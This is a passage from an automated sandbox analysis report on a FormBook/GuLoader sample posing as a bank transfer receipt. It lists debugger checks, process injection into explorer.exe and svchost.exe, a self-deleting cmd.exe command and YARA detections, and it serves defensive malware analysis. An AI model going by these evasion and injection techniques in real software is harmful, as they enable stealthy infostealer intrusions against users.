Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A29100 mov eax, dword ptr fs:[00000030h] 22_2_03A29100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A29100 mov eax, dword ptr fs:[00000030h] 22_2_03A29100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2B171 mov eax, dword ptr fs:[00000030h] 22_2_03A2B171
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2B171 mov eax, dword ptr fs:[00000030h] 22_2_03A2B171
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4C577 mov eax, dword ptr fs:[00000030h] 22_2_03A4C577
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4C577 mov eax, dword ptr fs:[00000030h] 22_2_03A4C577
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4B944 mov eax, dword ptr fs:[00000030h] 22_2_03A4B944
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4B944 mov eax, dword ptr fs:[00000030h] 22_2_03A4B944
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A63D43 mov eax, dword ptr fs:[00000030h] 22_2_03A63D43
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA3540 mov eax, dword ptr fs:[00000030h] 22_2_03AA3540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A47D50 mov eax, dword ptr fs:[00000030h] 22_2_03A47D50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A690AF mov eax, dword ptr fs:[00000030h] 22_2_03A690AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5F0BF mov ecx, dword ptr fs:[00000030h] 22_2_03A5F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5F0BF mov eax, dword ptr fs:[00000030h] 22_2_03A5F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5F0BF mov eax, dword ptr fs:[00000030h] 22_2_03A5F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A29080 mov eax, dword ptr fs:[00000030h] 22_2_03A29080
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA3884 mov eax, dword ptr fs:[00000030h] 22_2_03AA3884
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA3884 mov eax, dword ptr fs:[00000030h] 22_2_03AA3884
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE14FB mov eax, dword ptr fs:[00000030h] 22_2_03AE14FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA6CF0 mov eax, dword ptr fs:[00000030h] 22_2_03AA6CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA6CF0 mov eax, dword ptr fs:[00000030h] 22_2_03AA6CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA6CF0 mov eax, dword ptr fs:[00000030h] 22_2_03AA6CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF8CD6 mov eax, dword ptr fs:[00000030h] 22_2_03AF8CD6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h] 22_2_03ABB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABB8D0 mov ecx, dword ptr fs:[00000030h] 22_2_03ABB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h] 22_2_03ABB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h] 22_2_03ABB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h] 22_2_03ABB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h] 22_2_03ABB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A3B02A mov eax, dword ptr fs:[00000030h] 22_2_03A3B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A3B02A mov eax, dword ptr fs:[00000030h] 22_2_03A3B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A3B02A mov eax, dword ptr fs:[00000030h] 22_2_03A3B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A3B02A mov eax, dword ptr fs:[00000030h] 22_2_03A3B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5BC2C mov eax, dword ptr fs:[00000030h] 22_2_03A5BC2C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA6C0A mov eax, dword ptr fs:[00000030h] 22_2_03AA6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA6C0A mov eax, dword ptr fs:[00000030h] 22_2_03AA6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA6C0A mov eax, dword ptr fs:[00000030h] 22_2_03AA6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA6C0A mov eax, dword ptr fs:[00000030h] 22_2_03AA6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF740D mov eax, dword ptr fs:[00000030h] 22_2_03AF740D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF740D mov eax, dword ptr fs:[00000030h] 22_2_03AF740D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF740D mov eax, dword ptr fs:[00000030h] 22_2_03AF740D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF4015 mov eax, dword ptr fs:[00000030h] 22_2_03AF4015
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF4015 mov eax, dword ptr fs:[00000030h] 22_2_03AF4015
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA7016 mov eax, dword ptr fs:[00000030h] 22_2_03AA7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA7016 mov eax, dword ptr fs:[00000030h] 22_2_03AA7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA7016 mov eax, dword ptr fs:[00000030h] 22_2_03AA7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4746D mov eax, dword ptr fs:[00000030h] 22_2_03A4746D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF1074 mov eax, dword ptr fs:[00000030h] 22_2_03AF1074
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE2073 mov eax, dword ptr fs:[00000030h] 22_2_03AE2073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A40050 mov eax, dword ptr fs:[00000030h] 22_2_03A40050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A40050 mov eax, dword ptr fs:[00000030h] 22_2_03A40050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABC450 mov eax, dword ptr fs:[00000030h] 22_2_03ABC450
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABC450 mov eax, dword ptr fs:[00000030h] 22_2_03ABC450
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F35165 SetFileAttributesA,LdrResolveDelayLoadedAPI,LocalFree,LocalFree,SetCurrentDirectoryA, 0_2_00F35165
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F37360 SetUnhandledExceptionFilter, 0_2_00F37360
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F36C35 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00F36C35

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Thread register set: target process: 3352
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Thread register set: target process: 3352
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe"
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F315FC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary, 0_2_00F315FC
Source: explorer.exe, 00000015.00000000.740986276.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000015.00000000.727918009.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000015.00000000.756092211.0000000000B68000.00000004.00000020.sdmp Binary or memory string: Progman\Pr
Source: explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000015.00000000.729737334.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000015.00000000.749218115.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000015.00000000.733926654.0000000008778000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndh
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F375A8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00F375A8
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F32A7E GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle, 0_2_00F32A7E

Stealing of Sensitive Information:

Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: nongrav.exe PID: 4520, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 6932, type: MEMORYSTR
Yara detected FormBook
Source: Yara match File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY